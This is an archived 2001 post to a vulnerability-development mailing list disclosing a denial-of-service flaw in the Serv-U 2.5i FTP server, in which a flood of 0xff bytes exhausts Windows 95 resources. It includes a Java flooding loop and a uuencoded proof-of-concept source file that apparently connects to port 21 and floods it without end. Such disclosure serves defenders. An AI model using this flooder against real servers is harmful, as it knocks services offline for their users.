Vulnerability Development mailing list archives
Serv-U 2.5i DoS
From: "Steven, Bates" <Craig () FREENET DE>
Date: Sun, 25 Feb 2001 07:55:29 -0700
Hi, I think I found another DoS issue in Serv-U 2.5i: I've downloaded the "Fixed" version of Serv-U yesterday. I installed it on one of my pc's and started %windir%\RSRCMTR.EXE to see how many resources are used when I flood it. Then I started to play around with the server: Ftp> open server Connected to server. 220 Serv-U FTP-Server v2.5i for WinSock ready... I coded a little java application which flooded the server with 0x00 chars, but at least that bug was fixed. So I tried other chars and found out, that 0xff was a good choice. The application just sends out 0xff chars in a never ending loop (I added a Counter to see how much chars are needed to block/crash it). char nuke=0xff; int Counter=0; while(true) { sout.print(nuke); Counter++; if(Counter%10000==0) System.out.println(Counter+" 0xff sent"); } I started it, and the resources got lower and lower. When about 290000 0xff chars were sent, there was a popup (I am sure every Win9x user saw it once) which said that 90% of the resources were already used, and that some programs should be closed. I tried to click the "OK" button, but the popup did not react. I also noticed that the mouse cursor was moving strange... I tried to login from an other pc: Ftp>open Server Connected to server. Connection closed by remote host. but as you can see, it did not work - the connection closed after the timeout. Then I stopped the java application with STRG-C, the resource icon became green, the popup dissappeared (it finally noticed that I had clicked on it) and the server was working fine again. While writing this, I was testing the flooder, but after seeing the popup on the screen, I forgot to stop the flooder. When I finally noticed that, I stopped it - it had already sent about 2,5 Million 0xff chars to the server. I tried to connect to the ftpd, but I couldn't - I was connected and immediatley(!) disconnected. I tested it again, but this only works sometimes, i have now idea why. I do not know why the server acts like this, but this issue should really should be fixed. !! THE FLOODER DOES NOT WORK, IF THE SERV-U ICON IS JUST IN THE TRAY, YOU NEED TO SEE THE LOGGING SCREEN !! !! I was only able to repoduce this behaviour on Win95, on Win98 it did not seem to do anything !! [Craig] http://www.HaQuarter.De/ begin 600 ServU25i.java M:6UP;W)T(&IA=F$N:6\N*CL-"FEM<&]R="!J879A+FYE="XJ.PT*#0IP=6)L M:6,@8VQA<W,@4V5R=E4R-6D-"B![#0H)#0H)<W1A=&EC(%-T<FEN9R!397)V M97([#0H)#0H)<W1A=&EC(%-O8VME="!S/6YU;&P[#0H@('-T871I8R!0<FEN M=%-T<F5A;2!S;W5T.PT*("!S=&%T:6,@1&%T84EN<'5T4W1R96%M('-I;CL- M"B`@#0H@('-T871I8R!C:&%R(&YU:V4],'AF9CL-"B`@#0H@("`-"B`-"B!V M;VED($AO;&5%:6YG86)E;B@I#0H@"7L-"B`@('1R>0T*("`@"7L-"@D@"2`@ M#0H)(`D@(%-Y<W1E;2YO=70N<')I;G0H(EQN0W)A:6<G<R!397)V+54@1E10 M(#(N-6D@8FQO8VME<EQN16YT97(@4V5R=F5R/B(I.PT*"2`)("!$871A26YP M=713=')E86T@:6X@/2!N97<@1&%T84EN<'5T4W1R96%M("A3>7-T96TN:6XI M.PT*"2`)("!397)V97(]:6XN<F5A9$QI;F4H*3L-"@D@"2`@"2`)(`T*"2`) M?0T*("`@("!C871C:"`H24]%>&-E<'1I;VX@92D@>U-Y<W1E;2YE<G(N<')I M;G1L;BAE*3M]#0H@"7T-"@T*(`T*(`T*('9O:60@5F5R8FEN9&4H*0T*(`E[ M#0H@"2!T<GD-"B`)"7L@#0H@"2`@("`-"B`)("`@(',@/2!N97<@4V]C:V5T M*%-E<G9E<BP@,C$I.PT*"2`@("!S:6X@/2!N97<@1&%T84EN<'5T4W1R96%M M("AS+F=E=$EN<'5T4W1R96%M*"DI.PT*"2`@("!S;W5T(#T@;F5W(%!R:6YT M4W1R96%M("AS+F=E=$]U='!U=%-T<F5A;2@I*3L-"@D@("`@#0H)("`@(&EN M="!#;W5N=&5R/3`[#0H)("`@('=H:6QE*'1R=64I#0H@"2`)("`@>PT*(`D@ M"2`@(`ES;W5T+G!R:6YT*&YU:V4I.PT*(`D@"2`@("!#;W5N=&5R*RL[#0H@ M"2`)("`@(&EF*$-O=6YT97(E,3`P,#`]/3`I4WES=&5M+F]U="YP<FEN=&QN M*$-O=6YT97(K(B`P>&9F('-E;G0B*3L-"B`)(`D@("!]#0H)("`@("`)("`@ M("`@(`T*"2`@('T-"B`@("!C871C:"`H24]%>&-E<'1I;VX@92E[?0T*#0H@ M"7T-"B`-"B`-"B`-"B!P=6)L:6,@<W1A=&EC('9O:60@;6%I;BA3=')I;F=; M72!A<F=S*0T*"7L-"B`)(`T*(`D@4V5R=E4R-6D@;F]W/6YE=R!397)V53(U M:2 () I PT*"2!N;W<N2&]L945I;F=A8F5N*"D[#0H)(&YO=RY697)B:6YD92@I @.PT*"2`)#0H)?0T*#0I]#0H@("`@("`@("`@("`@(`EO end
Current thread:
- Serv-U 2.5i DoS Steven, Bates (Feb 25)
- Re: Serv-U 2.5i DoS Sommer Ishay (Feb 26)